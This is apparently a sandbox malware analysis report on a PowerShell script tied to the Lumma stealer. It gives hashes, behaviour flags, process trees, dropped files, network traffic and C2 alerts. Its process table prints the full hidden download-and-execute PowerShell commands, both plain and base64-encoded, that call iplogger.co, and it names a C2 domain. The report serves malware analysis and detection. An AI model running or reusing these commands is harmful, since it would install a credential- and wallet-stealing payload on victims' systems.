File name:

ofsetvideofre.click.ps1

Full analysis: https://app.any.run/tasks/3e5dcc37-b67e-40b0-8bb2-87383cb5bce0
Verdict: Malicious activity
Threats:

Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat.

Analysis date: September 07, 2024, 21:45:31
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
lumma
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

A63AD45894B36993E894E20279BE145A

SHA1:

40B85944355791391A5F4E46BFE596893D0C8F78

SHA256:

A8874E8A45555E5B3CBF40CE49BD4E79731CC740D4D0F4D9C55CFC0D770679C1

SSDEEP:

6:s8qkKYHazxkQ7C23kobe+sX54ks7TQKoak0DeCj6eMiNQR4sbk:s8q/YHSxpC01CTIfQmzuRA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7004)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2584)
      • powershell.exe (PID: 4784)
    • Connects to the CnC server

      • svchost.exe (PID: 2256)
    • LUMMA has been detected (SURICATA)

      • SearchIndexer.exe (PID: 6160)
      • svchost.exe (PID: 2256)
    • Stealers network behavior

      • SearchIndexer.exe (PID: 6160)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7004)
      • powershell.exe (PID: 4784)
    • Application launched itself

      • powershell.exe (PID: 4784)
      • powershell.exe (PID: 7004)
    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2256)
      • powershell.exe (PID: 2584)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 7004)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 2584)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 4784)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 7004)
    • Checks for external IP

      • powershell.exe (PID: 2584)
      • svchost.exe (PID: 2256)
    • Request a resource from the Internet using PowerShell's cmdlet

      • powershell.exe (PID: 4784)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 2584)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 2584)
    • The process creates files with name similar to system file names

      • powershell.exe (PID: 2584)
    • Executable content was dropped or overwritten

      • Set-up.exe (PID: 4392)
      • powershell.exe (PID: 2584)
    • Starts application with an unusual extension

      • Set-up.exe (PID: 4392)
    • Contacting a server suspected of hosting an CnC

      • SearchIndexer.exe (PID: 6160)
      • svchost.exe (PID: 2256)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 2584)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2584)
    • Checks proxy server information

      • powershell.exe (PID: 2584)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2584)
    • The process uses the downloaded file

      • powershell.exe (PID: 2584)
    • Checks supported languages

      • StrCmp.exe (PID: 2268)
      • Set-up.exe (PID: 4392)
      • more.com (PID: 3672)
    • The executable file from the user directory is run by the Powershell process

      • Set-up.exe (PID: 4392)
    • Reads the computer name

      • Set-up.exe (PID: 4392)
      • StrCmp.exe (PID: 2268)
      • more.com (PID: 3672)
    • Creates files or folders in the user directory

      • Set-up.exe (PID: 4392)
    • Create files in a temporary directory

      • Set-up.exe (PID: 4392)
      • more.com (PID: 3672)
    • Reads the software policy settings

      • SearchIndexer.exe (PID: 6160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
10
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe #LUMMA svchost.exe set-up.exe strcmp.exe no specs more.com no specs conhost.exe no specs #LUMMA searchindexer.exe

Process information

PID
CMD
Path
Indicators
Parent process
2256C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2268C:\Users\admin\AppData\Roaming\CHM\JHPCDDOJEKVIFLPVMWR\StrCmp.exeC:\Users\admin\AppData\Roaming\CHM\JHPCDDOJEKVIFLPVMWR\StrCmp.exeSet-up.exe
User:
admin
Company:
aaa
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\users\admin\appdata\roaming\chm\jhpcddojekviflpvmwr\strcmp.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvbvm60.dll
2584"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -c "iex (iwr https://iplogger.co/2h4Cg5 -UseBasicParsing).Content"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2700\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3672C:\WINDOWS\SysWOW64\more.comC:\Windows\SysWOW64\more.comSet-up.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
More Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\more.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ulib.dll
4392"C:\Users\admin\AppData\Local\Temp\file\Set-up.exe" C:\Users\admin\AppData\Local\Temp\file\Set-up.exe
powershell.exe
User:
admin
Company:
iTop Inc.
Integrity Level:
MEDIUM
Description:
iTop Screen Recorder
Exit code:
1
Version:
3.0.0.945
Modules
Images
c:\users\admin\appdata\local\temp\file\set-up.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
4784"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AaQBwAGwAbwBnAGcAZQByAC4AYwBvAC8AMgBoADQAQwBnADUAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6160C:\WINDOWS\SysWOW64\SearchIndexer.exeC:\Windows\SysWOW64\SearchIndexer.exe
more.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Windows Search Indexer
Exit code:
0
Version:
7.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\orioarjh
c:\windows\syswow64\searchindexer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
6168\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exemore.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7004"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\ofsetvideofre.click.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
15 634
Read events
15 620
Write events
14
Delete events
0

Modification events

(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2584) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
52
Suspicious files
38
Text files
396
Unknown types
0

Dropped files

PID
Process
Filename
Type
7004powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dstyyli0.tih.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:E16BBB42015D4055DC1A56E05470DA46
SHA256:FF638C9F44B13E759BB94D79914068317A60BDE04DD1AF05AC6A01B5195214BD
7004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GDLWWUJ72W0D8JTYT2YA.tempbinary
MD5:E16BBB42015D4055DC1A56E05470DA46
SHA256:FF638C9F44B13E759BB94D79914068317A60BDE04DD1AF05AC6A01B5195214BD
7004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF129f94.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
4784powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ry0d5ifp.nzf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4784powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f23vh3aa.l1s.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7004powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bmxkxri1.k4n.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2584powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_10bnqqst.j3m.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2584powershell.exeC:\Users\admin\AppData\Local\Temp\file\Resource\AppCompat.admxxml
MD5:9F090D18F3BDB120480CC63F1BC5E5FD
SHA256:3377EAAE4A6F7CD036D70C5F3358870F29AC536C06A4FD784D10E1840201B1DB
2584powershell.exeC:\Users\admin\AppData\Local\Temp\file\ffjqbinary
MD5:55FDC73A2152B6BC79BF4939121EBA2D
SHA256:2C230D7E8F82A45DED81AF02648744876B6F979854794C0E854F328F09913E30
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
40
DNS requests
17
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2120
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1780
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6768
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6768
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
7008
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2120
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
3260
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1780
svchost.exe
20.190.159.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1780
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
7008
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
google.com
  • 172.217.16.206
whitelisted
client.wns.windows.com
  • 40.113.110.67
  • 40.113.103.199
whitelisted
login.live.com
  • 20.190.159.71
  • 20.190.159.0
  • 40.126.31.73
  • 20.190.159.75
  • 20.190.159.23
  • 20.190.159.2
  • 20.190.159.4
  • 40.126.31.71
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
iplogger.co
  • 172.67.167.249
  • 104.21.82.93
shared
tengkis-txt.b-cdn.net
  • 169.150.247.40
whitelisted
tengkis.b-cdn.net
  • 138.199.37.232
whitelisted
slscr.update.microsoft.com
  • 52.165.165.26
whitelisted

Threats

PID
Process
Class
Message
2256
svchost.exe
Domain Observed Used for C2 Detected
ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (bassicnuadnwi .shop)
6160
SearchIndexer.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
6160
SearchIndexer.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Lumma Stealer Related Domain (bassicnuadnwi .shop in TLS SNI)
2 ETPRO signatures available at the full report
No debug info